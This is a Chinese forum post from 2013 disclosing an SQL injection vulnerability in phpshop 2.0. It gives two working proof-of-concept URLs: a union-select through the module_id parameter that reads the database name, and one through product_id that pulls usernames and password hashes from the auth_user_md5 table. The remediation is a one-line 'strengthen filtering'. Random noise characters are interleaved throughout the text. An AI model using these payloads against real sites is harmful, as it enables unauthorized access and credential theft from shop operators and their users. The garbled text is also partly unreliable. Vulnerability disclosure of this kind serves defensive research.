标题 : phpshop 2.0 SQL Injection Vulnerability
. g8 V- j' N8 M
: A8 D0 w$ a* _' ]. n2 C作者 : By onestree& S- f. v) o. X) b3 y. ]
下载地址 : http://code.google.com/p/phpshop/downloads/list
a: O& V$ i4 H2 F P测试地址: windows 7 / ubuntu
, I- V+ Z9 s0 D' n c: x) y
s; m% ^9 b( i/ B4 B0 C0 T
5 A. A# J# M- C! VSQLi p0c:: i' u2 G7 ?, R- I* ?" r
* v9 P; d8 V [- f==================
/ T# w* J; p$ |- m/ O/ c 4 X1 W/ _6 Y, U3 ?: O8 v
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
8 i5 G, M S6 f9 R" {! D& dunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --& W. [1 O/ I, M2 e6 x& [. |) u A
* F3 F' ]) Z% ?http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
* I( v8 J; t0 |3 P9 F4 L
. o/ `8 O }; N) e( S修复:
' G5 K% ?' x5 Z* t* L加强过滤
0 H+ s/ B6 O4 N' @( M. D0 C5 _2 F( }1 h t+ h
[$ K4 z4 P. h+ l$ | |
发表于 2013-1-18 18:24:10
收藏
支持
反对